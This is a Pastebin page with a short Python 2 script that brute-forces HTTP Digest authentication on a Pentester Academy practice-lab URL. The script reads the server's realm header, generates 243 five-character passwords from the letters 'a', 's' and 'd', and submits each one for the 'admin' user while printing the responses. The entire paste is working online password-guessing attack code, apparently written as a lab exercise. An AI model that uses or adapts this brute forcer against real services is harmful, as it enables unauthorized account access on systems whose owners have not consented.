Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import urllib2
- import requests
- from requests.auth import HTTPDigestAuth
- theurl="http://pentesteracademylab.appspot.com/lab/webapp/digest/1"
- all_pass = []
- def run_attack():
- '''
- just to get the Realm and other trick data
- http://www.voidspace.org.uk/python/articles/authentication.shtml
- '''
- req = urllib2.Request(theurl)
- try:
- handle = urllib2.urlopen(req)
- except IOError, e:
- if hasattr(e, 'code'):
- if e.code != 401:
- print 'We got another error'
- print e.code
- else:
- print e.headers
- print e.headers['www-authenticate']
- def run_attack2():
- maxlen = len(all_pass)
- index = 0
- while index < maxlen:
- mypass = all_pass.pop()
- saida = requests.get(theurl, auth=HTTPDigestAuth('admin', mypass))
- print saida , "->", mypass
- index = index + 1
- def gen_password():
- '''very dumb pass generator ;) lazy today '''
- alp = ["a","s","d"]
- for I in range(0,3):
- for Z in range (0,3):
- for X in range (0,3):
- for Y in range (0,3):
- for W in range (0,3):
- foo = alp[I]+alp[Z]+alp[X]+alp[Y]+alp[W]
- all_pass.append(foo)
- print len(all_pass)
- gen_password()
- run_attack2()
Add Comment
Please, Sign In to add comment